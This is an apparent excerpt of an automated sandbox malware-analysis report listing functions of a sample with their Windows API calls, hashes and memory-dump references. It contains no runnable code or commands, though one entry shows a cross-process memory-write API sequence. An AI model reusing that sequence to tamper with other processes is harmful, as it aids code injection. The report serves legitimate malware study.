                            • Opcode Fuzzy Hash: 402b731101056b2abf03cb264fe64b19e09fa9c0999ac0b132ce3f5fabc08b92
                            • Instruction Fuzzy Hash: 6A2104322042017BEF259B79AD49E7F7BA9DF49720F05413AF805DA2A1EF61DC4097B4
                            Function 00DCB14B Relevance: 7.6, APIs: 5, Instructions: 85COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00D42612: GetWindowLongW.USER32(?,000000EB), ref: 00D42623
                            • GetWindowLongW.USER32(?,000000F0), ref: 00DCB192
                            • SetWindowLongW.USER32(00000000,000000F0,00000001,?,?,?,?,00DB0E90,00000000,?,00000000), ref: 00DCB1B7
                            • SetWindowLongW.USER32(00000000,000000EC,000000FF,?,?,?,?,00DB0E90,00000000,?,00000000), ref: 00DCB1CF
                            • GetSystemMetrics.USER32(00000004,?,?,?,?,?,?,?,00DB0E90,00000000,?,00000000), ref: 00DCB1F8
                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047), ref: 00DCB216
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: Window$Long$MetricsSystem
                            • String ID:
                            • API String ID: 2294984445-0
                            • Opcode ID: b4785c195ba74af628f3a865ecd7f7084aca7e6b0cde0e2b9581bc8be4e4c265
                            • Instruction ID: f3f93b2e1a7628602bbd04d605654ef66b99c5b99f6a84b23484e4222fa1922d
                            • Opcode Fuzzy Hash: b4785c195ba74af628f3a865ecd7f7084aca7e6b0cde0e2b9581bc8be4e4c265
                            • Instruction Fuzzy Hash: B2217E71920253AFCB149F38DC05F6A7BA5EB05331F19463AB962D72E0D730D8509BA0
                            Function 00D99307 Relevance: 7.6, APIs: 5, Instructions: 84windowCOMMON
                            Download Yara Rule
                            APIs
                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00D99320
                              • Part of subcall function 00D47BCC: _memmove.LIBCMT ref: 00D47C06
                            • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00D99352
                            • __itow.LIBCMT ref: 00D9936A
                            • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00D99392
                            • __itow.LIBCMT ref: 00D993A3
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: MessageSend$__itow$_memmove
                            • String ID:
                            • API String ID: 2983881199-0
                            • Opcode ID: d4173d6312c2faa9ed2264b36db977fd7927463e623649bb178306c769555ec7
                            • Instruction ID: cd60ded26a5d01e645bea23ae56f6aae554b9e38a92238f1543216e72cbe3e97
                            • Opcode Fuzzy Hash: d4173d6312c2faa9ed2264b36db977fd7927463e623649bb178306c769555ec7
                            • Instruction Fuzzy Hash: B721D731700209ABDF10AF698C95EEEBBA9EB48710F04402DFD45D72D1DAB1CD4597B1
                            Function 00DB5A4D Relevance: 7.6, APIs: 5, Instructions: 70COMMON
                            Download Yara Rule
                            APIs
                            • IsWindow.USER32(00000000), ref: 00DB5A6E
                            • GetForegroundWindow.USER32 ref: 00DB5A85
                            • GetDC.USER32(00000000), ref: 00DB5AC1
                            • GetPixel.GDI32(00000000,?,00000003), ref: 00DB5ACD
                            • ReleaseDC.USER32(00000000,00000003), ref: 00DB5B08
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: Window$ForegroundPixelRelease
                            • String ID:
                            • API String ID: 4156661090-0
                            • Opcode ID: 79111ae822e213cb5bb919b4be5183d8571e72a9a4d2a502f09865b5335e2898
                            • Instruction ID: 4a261b81edfcb6d31f3199d6862290fb4e06f3f66e9d9b5fc15056899c16369a
                            • Opcode Fuzzy Hash: 79111ae822e213cb5bb919b4be5183d8571e72a9a4d2a502f09865b5335e2898
                            • Instruction Fuzzy Hash: 17216F75A00205AFDB14EF69D884A9ABBE5EF48310F148479F84AD7362DA30AD01DBB0
                            Function 00D412F3 Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                            Download Yara Rule
                            APIs
                            • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000), ref: 00D4134D
                            • SelectObject.GDI32(?,00000000), ref: 00D4135C
                            • BeginPath.GDI32(?), ref: 00D41373
                            • SelectObject.GDI32(?,00000000), ref: 00D4139C
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: ObjectSelect$BeginCreatePath
                            • String ID:
                            • API String ID: 3225163088-0
                            • Opcode ID: 5a80b2f47cfd113953f77a47df4671565d1ecba669f7feb48ba9c543fbaf01e7
                            • Instruction ID: 3d2b1934a7f69770feb77ae79db72d9c824a8b85cbefff9e362ba4b01712b1e9
                            • Opcode Fuzzy Hash: 5a80b2f47cfd113953f77a47df4671565d1ecba669f7feb48ba9c543fbaf01e7
                            • Instruction Fuzzy Hash: 21216531800709DFDB159F16EC4976A7BE5F700761F18822AF854A61B0D37199D9DF70
                            Function 00DA4A93 Relevance: 7.6, APIs: 5, Instructions: 56synchronizationthreadwindowCOMMON
                            Download Yara Rule
                            APIs
                            • GetCurrentThreadId.KERNEL32 ref: 00DA4ABA
                            • __beginthreadex.LIBCMT ref: 00DA4AD8
                            • MessageBoxW.USER32 ref: 00DA4AED
                            • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00DA4B03
                            • CloseHandle.KERNEL32(00000000), ref: 00DA4B0A
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                            • String ID:
                            • API String ID: 3824534824-0
                            • Opcode ID: 5b736fdf6f2c0c6e44f3f735d0a246af692c5cfc83c154852e35f51dba6a0e18
                            • Instruction ID: deab856ae9e8fbcdb0fc5152e4f53a681d3e9085ceac63b7bb1df281b642a6ce
                            • Opcode Fuzzy Hash: 5b736fdf6f2c0c6e44f3f735d0a246af692c5cfc83c154852e35f51dba6a0e18
                            • Instruction Fuzzy Hash: 3D11E576904715BFD7008FA99C04ADB7BADEB85320F184265F824D33A0D6B1C9448BB0
                            Function 00D98202 Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON
                            Download Yara Rule
                            APIs
                            • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00D9821E
                            • GetLastError.KERNEL32(?,00D97CE2,?,?,?), ref: 00D98228
                            • GetProcessHeap.KERNEL32(00000008,?,?,00D97CE2,?,?,?), ref: 00D98237
                            • HeapAlloc.KERNEL32(00000000,?,00D97CE2,?,?,?), ref: 00D9823E
                            • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00D98255
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                            • String ID:
                            • API String ID: 842720411-0
                            • Opcode ID: d18eb270e30c8f7220fec4b95bc01a7fe423f9d5b269186f764a2d8cff623b19
                            • Instruction ID: 038aeb9abb75b641054357bb1323a0b0666b9d3108aca95867224cab2f5c163c
                            • Opcode Fuzzy Hash: d18eb270e30c8f7220fec4b95bc01a7fe423f9d5b269186f764a2d8cff623b19
                            • Instruction Fuzzy Hash: FC011D71641706BFDF204FA6DC48DAB7FADEF8A755B54056AF849C3260DA319C00EA70
                            Function 00D9710A Relevance: 7.5, APIs: 5, Instructions: 48stringCOMMON
                            Download Yara Rule
                            APIs
                            • CLSIDFromProgID.OLE32 ref: 00D97127
                            • ProgIDFromCLSID.OLE32(?,00000000), ref: 00D97142
                            • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00D97044,80070057,?,?), ref: 00D97150
                            • CoTaskMemFree.OLE32(00000000), ref: 00D97160
                            • CLSIDFromString.OLE32(?,?), ref: 00D9716C
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: From$Prog$FreeStringTasklstrcmpi
                            • String ID:
                            • API String ID: 3897988419-0
                            • Opcode ID: c0f98bf8c830e6ea144c39a0f0fc688929acae2ea8d67100dd58705c9376a8b1
                            • Instruction ID: e660cdd9a35ec2e4b58fd21d29dc1d6119c4982c7c47b1cbd66aa61b6ce87898
                            • Opcode Fuzzy Hash: c0f98bf8c830e6ea144c39a0f0fc688929acae2ea8d67100dd58705c9376a8b1
                            • Instruction Fuzzy Hash: 6E017CB2621306BBDB114F64DC44EAA7BAEEF44791F141064FD08E2320D731DD419BB0
                            Function 00DA5244 Relevance: 7.5, APIs: 5, Instructions: 48sleepCOMMON
                            Download Yara Rule
                            APIs
                            • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00DA5260
                            • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00DA526E
                            • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00DA5276
                            • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00DA5280
                            • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00DA52BC
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: PerformanceQuery$CounterSleep$Frequency
                            • String ID:
                            • API String ID: 2833360925-0
                            • Opcode ID: 59d66d50d373e271aed694875db8d2c2946f3e8e7a57dd4225bbc7e7d8a8b4e1
                            • Instruction ID: 019709f1224edc4347ff52db4ee6e1adac2cafe90fc9fd03ef354b1513b8ad87
                            • Opcode Fuzzy Hash: 59d66d50d373e271aed694875db8d2c2946f3e8e7a57dd4225bbc7e7d8a8b4e1
                            • Instruction Fuzzy Hash: 3C011731D01B1ADBCF00EFE4E849AEDBB79FB0A711F450156E945F2245CB3095548BB9
                            Function 00D9810A Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                            Download Yara Rule
                            APIs
                            • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00D98121
                            • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00D9812B
                            • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00D9813A
                            • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00D98141
                            • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00D98157
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: HeapInformationToken$AllocErrorLastProcess
                            • String ID:
                            • API String ID: 44706859-0
                            • Opcode ID: bb595ef370648134d8d58f00376f4b1115dba84fd9532f00120ef31b768a249d
                            • Instruction ID: 8353eb39f382ab3a39b767954e6025b5ac62197b10e2f2200c2742421dfb94ac
                            • Opcode Fuzzy Hash: bb595ef370648134d8d58f00376f4b1115dba84fd9532f00120ef31b768a249d
                            • Instruction Fuzzy Hash: EEF06271200306BFEB110FA5EC89EAB3BADFF4AB54B040025F986D6250CB619D41EA70
                            Function 00D9C1E3 Relevance: 7.5, APIs: 5, Instructions: 41windowtimeCOMMON
                            Download Yara Rule
                            APIs
                            • GetDlgItem.USER32(?,000003E9), ref: 00D9C1F7
                            • GetWindowTextW.USER32(00000000,?,00000100), ref: 00D9C20E
                            • MessageBeep.USER32(00000000), ref: 00D9C226
                            • KillTimer.USER32 ref: 00D9C242
                            • EndDialog.USER32 ref: 00D9C25C
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: BeepDialogItemKillMessageTextTimerWindow
                            • String ID:
                            • API String ID: 3741023627-0
                            • Opcode ID: 83180ccc54f375eafc56812b283569bd35394dbb53ced3e91a2e33fb9f6f5375
                            • Instruction ID: b62d54ea837277c46a47a39a4a8f1b6ee8df85b62c227ee9124e069437032f77
                            • Opcode Fuzzy Hash: 83180ccc54f375eafc56812b283569bd35394dbb53ced3e91a2e33fb9f6f5375
                            • Instruction Fuzzy Hash: 0101AD30454306ABEB245B60ED4EFD677B9FB00B06F04426AA582E15E1DBF0A9489BB4
                            Function 00D413B0 Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: Path$ObjectStroke$DeleteFillSelect
                            • String ID:
                            • API String ID: 2625713937-0
                            • Opcode ID: 1bf26fa438dcd476a34dd9a12346918d1810b36ad2db0e3147637f1a1d8da99b
                            • Instruction ID: 143c5834d4e991622666e3b5bafef88425384d4ef4d148965e2974d54396f78d
                            • Opcode Fuzzy Hash: 1bf26fa438dcd476a34dd9a12346918d1810b36ad2db0e3147637f1a1d8da99b
                            • Instruction Fuzzy Hash: 46F0FB3500070A9FDB155F56EC4CB993BA5A700726F08C235E869981F1C73289D9DF30
                            Function 00D52CFB Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 265COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00D60DB6: std::exception::exception.LIBCMT ref: 00D60DEC
                              • Part of subcall function 00D60DB6: __CxxThrowException@8.LIBCMT ref: 00D60E01
                              • Part of subcall function 00D47DE1: _memmove.LIBCMT ref: 00D47E22
                              • Part of subcall function 00D47A51: _memmove.LIBCMT ref: 00D47AAB
                            • __swprintf.LIBCMT ref: 00D52ECD
                            Strings
                            • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00D52D66
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                            • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                            • API String ID: 1943609520-557222456
                            • Opcode ID: 4a0d02bfe33b2b5f70b4813c08a01a9af856ca88c37803a258f943bd216f8c79
                            • Instruction ID: f732faafc4acdab7d1658926704a67bf71ac0a8f952760e713bbb96314aa929a
                            • Opcode Fuzzy Hash: 4a0d02bfe33b2b5f70b4813c08a01a9af856ca88c37803a258f943bd216f8c79
                            • Instruction Fuzzy Hash: D0913A711082019FCB14EF24D896D7FB7A4EF95714F04491DF8959B2A2EB20ED49CB72
                            Function 00DAB93B Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261comCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00D44750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00D44743,?,?,00D437AE,?), ref: 00D44770
                            • CoInitialize.OLE32(00000000), ref: 00DAB9BB
                            • CoCreateInstance.OLE32(00DD2D6C,00000000,00000001,00DD2BDC,?), ref: 00DAB9D4
                            • CoUninitialize.OLE32 ref: 00DAB9F1
                              • Part of subcall function 00D49837: __itow.LIBCMT ref: 00D49862
                              • Part of subcall function 00D49837: __swprintf.LIBCMT ref: 00D498AC
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                            • String ID: .lnk
                            • API String ID: 2126378814-24824748
                            • Opcode ID: dc8446524969845ab124699641b56097dc22ab1af1684e71e12a5d2ec103513d
                            • Instruction ID: af32b7d8f3d41fff5366c446fde8a7a2393b1b20904257d95f13432d49aa19e2
                            • Opcode Fuzzy Hash: dc8446524969845ab124699641b56097dc22ab1af1684e71e12a5d2ec103513d
                            • Instruction Fuzzy Hash: 66A169756043059FCB10DF15C494D6ABBE5FF8A324F048959F89A9B3A2CB31EC46CBA1
                            Function 00D6501D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON
                            Download Yara Rule
                            APIs
                            • __startOneArgErrorHandling.LIBCMT ref: 00D650AD
                              • Part of subcall function 00D700F0: __87except.LIBCMT ref: 00D7012B
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: ErrorHandling__87except__start
                            • String ID: pow
                            • API String ID: 2905807303-2276729525
                            • Opcode ID: c17eed7e9cef92dd042a3bcfedc24a527c07ddda8a7544c5eaec0ae399eb8daa
                            • Instruction ID: a567aaa837a4b4ae090923cfa50341d79f01d112bb9cb2c6a56c91726d2dbd47
                            • Opcode Fuzzy Hash: c17eed7e9cef92dd042a3bcfedc24a527c07ddda8a7544c5eaec0ae399eb8daa
                            • Instruction Fuzzy Hash: A3515921918702D7DB116728D80136E3F94DB41700F68C999E8D9C62EEFF38C9D49AB6
                            Function 00D56192 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 141COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: _memset$_memmove
                            • String ID: ERCP
                            • API String ID: 2532777613-1384759551
                            • Opcode ID: 9831a8977eacaae607b6ba541cf828328971fc06577aa5e586c980c621e7cf26
                            • Instruction ID: c660220350d45800b3651a01e05f27fe5424f64d4e83464ed66827de6e4417fe
                            • Opcode Fuzzy Hash: 9831a8977eacaae607b6ba541cf828328971fc06577aa5e586c980c621e7cf26
                            • Instruction Fuzzy Hash: CC518D70900709DBDF24CF65C8417AABBE4EF04315F68856AED4AC7250E770EA48CB60
                            Function 00D997F5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 122windowCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00DA14BC: WriteProcessMemory.KERNEL32 ref: 00DA14E6
                            • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00D9983F
                              • Part of subcall function 00DA1487: ReadProcessMemory.KERNEL32 ref: 00DA14B1
                              • Part of subcall function 00DA13DE: GetWindowThreadProcessId.USER32(?,?), ref: 00DA1409
                              • Part of subcall function 00DA13DE: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00D9925A,00000034,?,?,00001004,00000000,00000000), ref: 00DA1419
                              • Part of subcall function 00DA13DE: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00D9925A,00000034,?,?,00001004,00000000,00000000), ref: 00DA142F
                            • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00D998AC
                            • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00D998F9
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
